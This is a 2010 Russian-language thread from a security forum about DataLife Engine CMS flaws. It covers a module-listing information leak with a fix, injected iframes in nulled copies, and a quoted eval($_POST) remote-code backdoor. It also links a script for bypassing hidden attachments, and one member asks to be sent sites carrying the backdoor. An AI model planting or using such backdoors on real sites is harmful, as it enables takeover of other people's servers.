HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.03.2010, 22:31
Alex$09
Новичок
Регистрация: 01.10.2009
Сообщений: 27
Провел на форуме:
52963

Репутация: -2
Lightbulb

Цитата:
Сообщение от botanig  
Как просмотреть, что под хайдом в DLE?
Так просто не посмотришь а смощию скрипта свободно можешь слить файлы не только дле но и другие движки...
http://new-dle.biz/exclusive/667-skript-obxoda-xajda-dlya-attachej-v-dle.html
 
Ответить с цитированием

  #2  
Старый 27.03.2010, 01:34
sir95
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191

Репутация: 0
По умолчанию

В 8.3, может и раньшых!
вывод какие модули стоят.

Файл

http://localhost/engine/ajax/antivirus.php

Вывод список!

Защищаемся
На начало добавить

PHP код:
if(!defined('DATALIFEENGINE'))
{
  die(
"You lol! Anatole yzhe tut");


Последний раз редактировалось sir95; 27.03.2010 в 01:37..
 
Ответить с цитированием

  #3  
Старый 09.04.2010, 12:00
saransko_o
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607

Репутация: 2
По умолчанию

имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?
 
Ответить с цитированием

  #4  
Старый 11.04.2010, 20:23
sir95
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191

Репутация: 0
По умолчанию

Цитата:
Сообщение от saransko_o  
имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?
Нулл движок?
 
Ответить с цитированием

  #5  
Старый 11.04.2010, 23:56
saransko_o
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607

Репутация: 2
По умолчанию

Цитата:
Сообщение от sir95  
Нулл движок?
да. нулл от MID.
 
Ответить с цитированием

  #6  
Старый 12.04.2010, 05:59
ReckouNT
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738

Репутация: 2
По умолчанию

В нуллах авторы нулла пишут уязвимости. Либо сами нуллите, либо юзайте фривар двиг.
Сам лично юзаю PHP - Fusion.
 
Ответить с цитированием

  #7  
Старый 12.04.2010, 15:06
saransko_o
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607

Репутация: 2
По умолчанию

Кстати на многих лицензия была

Последний раз редактировалось saransko_o; 12.04.2010 в 15:11..
 
Ответить с цитированием

  #8  
Старый 26.04.2010, 09:17
Firrst
Новичок
Регистрация: 17.10.2009
Сообщений: 1
Провел на форуме:
24095

Репутация: 0
По умолчанию

Никак, там в папке с загруженными файлами лежит htaccess, ты не выполнишь .php файл
 
Ответить с цитированием

  #9  
Старый 30.04.2010, 05:43
Rew
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188

Репутация: 0
По умолчанию

Есть бедкодер в папке /engine/ajax/

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}

Что с этим можно сделать?

Последний раз редактировалось Rew; 30.04.2010 в 05:46..
 
Ответить с цитированием

  #10  
Старый 30.04.2010, 06:08
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


По умолчанию

Цитата:
Сообщение от Rew  
Есть бедкодер в папке /engine/ajax/

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}

Что с этим можно сделать?
Ну например, отправить мне в ЛС список сайтов с этим бекдором
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.